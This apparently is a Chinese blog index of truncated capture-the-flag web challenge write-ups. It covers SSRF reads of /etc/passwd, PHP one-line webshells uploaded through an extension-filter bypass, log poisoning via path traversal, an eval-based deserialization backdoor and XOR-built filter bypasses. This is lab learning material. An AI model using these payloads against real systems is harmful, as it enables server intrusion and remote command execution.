Y0ung K1ng

web79开启环境尝试访问http://www.baidu.com/robots.txt查看网络,发现响应只有一条,说明这是ssrf于是我们进行运用file协议去读取服务器上的任意文件url=file:///etc/passwd 盲猜得到flag(通配符无法使用)web80开启环境后与上题一样,同样可以查到服务器中的文件接着进行内网的探测,有8088端口的监听找到flag

发布 评论

web56开启环境后源码<?php error_reporting(0); highlight_file(__FILE__); class backdoor{ public $name; public function __destruct(){ eval($this->name); } } $data = $_POST[�...

发布 1 条评论

web42开启环境后,发现是一个上传窗口尝试上传一句话木马<?php //一句话木马 eval($_POST[1]); ?> 上传成功,但是发现后缀被过滤了于是接下来进行抓包改后缀但是依然被过滤如此双写绕过构造成功上传,因为网页逻辑是将php改为空成功远程命令执行成功找到flagflag{1ca82bdc-7b0b-4952-8333-acfae217a823}原理php的文件上...

发布 1 条评论

web37开启环境后尝试读取文件,先跳转出设定的路径linux的目录位置是默认的,我们继续访问/?file=../../../../../../var/log/nginx/access.log 于是我们接下来把一句话木马写到我们的日志里面,不能写错,写错就错误了<?php eval($_POST[1]);?> 如此发包,注入我们的一句话木马,木马注入成功如此进行命令控制,phpi...

发布 3 条评论

web29开启环境后如果匹配到以下,则会阻止/[a-z0-9]/:这是一个正则表达式,[a-z0-9] 表示匹配任何小写字母(a-z)或数字(0-9)。/i:这是一个修饰符,表示进行不区分大小写的匹配。也就是说,这个正则表达式也会匹配大写字母。使用异或构造字母,也可以用or来构造("%08%02%08%08%05%0d"^"%7b%7b%7b%7c%60%60&...

发布 1 条评论